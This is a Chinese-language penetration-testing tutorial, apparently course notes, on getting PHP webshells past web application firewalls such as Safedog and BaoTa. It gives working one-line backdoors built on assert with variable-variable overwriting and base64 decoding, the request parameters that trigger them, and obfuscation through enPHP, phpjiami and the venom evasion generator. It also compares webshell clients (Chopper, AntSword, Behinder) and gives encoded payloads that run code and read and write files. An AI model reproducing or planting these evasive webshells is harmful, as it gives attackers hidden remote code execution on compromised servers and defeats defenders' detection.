04-waf绕过权限控制
WAF绕过-权限控制之代码混淆及行为造轮子
思维导图
后门工具介绍:
菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,偏向于后渗透,双向加密传输
冰蝎加密原理
单双向加密传输的区别:
双向加密传输就是发包之前已经加密了,并且从服务器传回来的数据也是加密的,这样在安全狗这些WAF检测内容的时候就狠nice。
一、Safedog-手写覆盖变量简易代码绕过-代码层
Safedog代码层手写及脚本绕过
- 变量覆盖,加密混淆,异或生成
在php代码中,( 美 元 符 号 ) 的 使 用 非 常 的 普 遍 , 它 用 来 表 示 一 个 自 定 义 的 变 量 , ( 例 : (美元符号)的使用非常的普遍,它用来表示一个自定义的变量,(例:(美元符号)的使用非常的普遍,它用来表示一个自定义的变量,(例:str),而有时候也会出现两个 $ 符号同时使用的情况,
php中$$符号的定义与作用例:
示例代码:
<?php
$var = 'hello word !';
$str = 'var';
echo $str;
echo $$str;
?>
输出结果:
var
hello word !
说明:
1、s t r 的 变 量 的 值 为 字 符 串 v a r 2 、 str的变量的值为字符串 var
2、str的变量的值为字符串var2、s t r 为 一 个 可 变 变 量 , str为一个可变变量,str为一个可变变量,str的值为 var 则 $$str 等同于 $var
原型后门
<?php assert($_POST['chopper'])?>//如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行
安全狗轻而易举就查到木马
绕过代码:使用变量覆盖.
什么是变量覆盖漏洞:
用自定义的传参数值替换原有变量值的情况称为变量覆盖漏洞
后门代码:
<?php$a=$_GET['x'];$$a=$_GET['y'];$b=($_POST['z']);
?>传递值:
//?x=b&y=assert解释:
//$a = b 先让$a=$b $$a传入assert ->$b 变量引用 //结果:$b($_POST['z']); 变为--->assert($_POST['z']) 后门代码
可以绕过safedog查杀上传成功后,
访问:http://127.0.0.1:8081/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata:z=phpinfo();
效果
二、Safedog,BT,Aliyun-覆盖变量 加密传输 绕过
采取上述覆盖变量的方式可以绕过安全狗查杀,但是会被宝塔拦截。
原因是 宝塔过滤规则里定义了phpinfo()等关键字。
在过滤规则中看到,传递的关键子进行了过滤判断。
方法:
所以可以配套 使用编码解码方式 绕过 宝塔。
一句话木马:<br><?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b(base64_decode($_POST['z']));
?>//传递的后门中进行解码//对PHPinfo();进行编码为cGhwaW5mbygpOw==
还可以采取加密传输:
上传加密后的语句,
访问:http://127.0.0.1:8081/x/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata:z=cGhwaW5mbygpOw==
成功:
三、Safedog-基于接口类加密混淆代码绕过-代码层
上传一句话木马:
<?php assert(base64_decode($_POST['chopper']));?>
木马文件被安全狗查杀
访问被安全狗拦截
方法1:使用enPHP工具加密混淆代码
enPHP:一个开源加密混淆 PHP 代码项目目标加密的代码,不要将code_test的文件移到或者删除很有可能会导致使用失败。
软件下载地址:
https://github.com/djunny/enphp
在线加密地址:
PHP加密|PHP在线加密|PHP解密|PHP代码解密|GOTO解密|PHP混淆 - EnPHP加密平台 (djunny.com)
加密混淆的脚本:
加密混淆后木马:
测试:
方法2:phpjiami在线加密混淆
如果上面的方式被安全狗杀掉,或者过不了宝塔的话。
网址:
http://phpjiami.com/phpjiami.html
[
木马加密前后对比:
绕过成功
四、异或加密Webshell-venom绕过
venom工具:支持生成asp、aspx、jsp、php等一句话免杀木马
- 下载:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
- https://github.com/yzddmr6/as_webshell_venom,
- 地址:https://gitee.com/Dyan_code/webshell-venom?_from=gitee_search
运行里面的脚本,然后就出来了,随机的。复制好上传就行。
python3 php_venom_3.3.py //生成免杀一句话python3 php_venom_3.3.py shell.php //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php
成功,记得如果要加密需要提交id的参数,不加密则不用
这里构造语句:
127.0.0.1/test.php?id=snkadpost mg6=加密
五、基于冰蝎新型控制器绕过全面测试
3个工具比较:
-
菜刀:已经不再更新了,无插件(看举例1),单向加密传输,打5分,不建议使用。
-
蚁剑:持续更新状态,有插件,扩展性强,缺点是单向加密传输,打8分。
-
冰蝎:持续更新状态,未知插件,扩展性强,双向加密传输,偏向于后渗透,可以联动msf.,打分9分,推荐使用。
下载地址:
- 冰蝎:https://github.com/rebeyond/Behinder/releases/
- 蚁剑:https://github.com/AntSwordProject/antSword/releases
1、菜刀单向加密举例:
抓包分析菜刀执行操作时候的数据包,然后模拟提交,返回了正常显示的目录列表。
2、冰蝎示例:
冰蝎双向加密传输原理:
冰蝎-双向加密传输-抓包查看
菜刀不支持加密无法绕过
六、基于手写新型控制器绕过全面测试
使用工具连接木马时,waf可能会通过工具的指纹实现拦截,此时我们可以采用如下方法绕过:
1、指纹变异、2、自己造轮子
自己写脚本模拟工具:
http://test.xxx.com/xx.php?x=b&y=assert
post data举例:
执行代码 z=phpinfo(); --> z=cGhwaW5mbygpOw==写入文件 z=file_put_contents("test.txt","1"); --> z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw==读取文件 z=var_dump(scandir(".")); --> z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs=##
读取:
写入文件
